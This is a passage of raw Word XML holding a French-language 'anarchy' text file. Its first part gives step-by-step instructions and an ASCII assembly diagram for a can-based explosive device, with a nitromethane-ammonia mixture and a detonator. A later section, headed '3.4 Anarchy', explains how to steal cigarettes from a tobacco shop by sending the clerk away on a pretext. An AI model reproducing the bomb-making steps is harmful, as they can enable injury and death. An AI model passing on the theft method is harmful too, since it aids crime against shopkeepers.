          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>cannette de 7up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>1. tremper le detonateur dans la cire liquide pour qu'il soit impermeable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>2. couper et enlever le dessu de la cannette</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>3. melanger 9 parties nitromethane avec 1 partie ammoniaque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>4. construire en suivant ce shema :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>eÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>º</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³       º       ³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³       º       ³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°°°º°°°°°°°³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°°°º°°°°°°°³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°²²²°°°°°°°³        Ä cannette de 7up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°²²²°°°°°°°³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°²²²°°°°°°°³        Í fil electrique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°°°°°°°°°°°³</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>³°°°°°°°°°°°°°°°³        ² detonateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>° nitromethane/ammoniaque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>5. faire detonner le detonnateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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______________________________________</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3.4 Anarchy: Comment Voler des article de taba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lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ok tu te rends a un tabagie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu parles au gars 10-15 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ensuite tu vas voir les magazines tu les feuillettes ..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu lui demandes si il a example: une Pipe, la tu inventes un # de chiffre et tu lui demandes si il peut Aller vérifier si il a cet article en arrière...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Pendant ce temps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu va en arrière de son bureau tu prends un paquet de cigarette et un briquet si tu en as pas...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu enlèves le papier dessus et tu le met dans une poubelle..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu le glisses dans ton sac et tu t'en vas à la place ou tu étais quand tu avais arrivé...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Le gars va resortir de son "atelier" en disant qu'il n'a pas la pipe...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Tu dis que ce n'est pas grave et que c'était un cadeau pour ton père...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
